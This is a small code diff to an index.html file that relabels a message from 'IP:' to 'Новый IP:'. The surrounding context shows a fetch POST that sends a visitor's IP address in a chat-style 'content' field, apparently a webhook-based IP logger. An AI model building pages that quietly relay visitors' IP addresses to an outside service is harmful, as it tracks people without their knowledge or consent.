--- a/index.html
+++ b/index.html
@@ -12,7 +12,7 @@
                     method: 'POST',
                     headers: {'Content-Type': 'application/json'},
                     body: JSON.stringify({
-                        content: `**IP:** ${data.ip}`
+                        content: `**Новый IP:** ${data.ip}`
                     })
                 })
             })
